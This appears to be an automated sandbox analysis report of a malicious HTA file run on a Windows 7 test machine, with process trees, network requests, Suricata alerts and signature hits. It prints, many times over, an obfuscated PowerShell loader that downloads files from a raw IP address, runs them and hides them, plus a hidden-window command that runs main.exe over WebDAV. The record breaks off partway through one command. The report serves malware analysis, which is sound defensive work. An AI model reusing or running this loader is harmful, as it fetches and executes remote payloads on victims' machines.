Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 17, 2023, 10:49 a.m. | Oct. 17, 2023, 10:51 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\at.hta.html
2616-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
2932-
-
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
2488
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
www2.lunapic.com | 72.9.146.243 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49169 -> 72.9.146.243:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49170 -> 72.9.146.243:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 91.207.183.9:8000 -> 192.168.56.101:49171 | 2026989 | ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1 | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://91.207.183.9:8000/main.bat |
request | GET http://91.207.183.9:8000/main.bat |
file | C:\Users\test22\AppData\Roaming\main.bat |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe |
Data received | |
Data received | F |
Data received | HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 01:50:15 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1 |
Data received | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe |
Data sent | s oe-èKJgÿ\ý)ö¼_hIJZÌêþ¯üè çZ / 5 ÀÀÀ À 2 8 .ÿ www2.lunapic.com |
Data sent | s oe-èLä ¤tlÞ£xoÃån"¶tÐ}*ʧþ / 5 ÀÀÀ À 2 8 .ÿ www2.lunapic.com |
Data sent | GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2616 CREDAT:145409 |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
host | 91.207.183.9 |
file | C:\Users\test22\AppData\Roaming\main.bat |
parent_process | iexplore.exe | martian_process | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; |
parent_process | iexplore.exe | martian_process | powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT; | ||||||
parent_process | iexplore.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function 